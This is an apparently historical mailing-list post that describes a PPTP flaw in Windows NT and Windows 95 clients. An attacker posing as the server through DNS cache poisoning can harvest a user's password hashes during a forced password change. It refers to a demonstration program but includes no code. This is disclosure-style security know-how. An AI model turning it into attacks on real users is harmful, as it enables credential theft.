In case you didn"t catch it, I wrote a little article for Phrack summarizing the different PPTP vulnerabilities. All of it has already been discussed except for one item. I mentioned this vulnerability on NTBugTraq a couple of months ago but no one paid much attention.

To make it short, an attacker that can masquerade as a PPTP server (via DNS cache poisoning, etc) can obtain the connecting user"s password hashes if they user is naive enough to change his password when the server tells him his password has expired.

The problem affects both the Windows NT PPTP client with the latest updates and the latest Windows 95 Dial-Up Networking. Attached you will find a small program that demonstrates the problem. It fixes some minor bugs in the Phrack article (don"t you love -Wall -pedantic).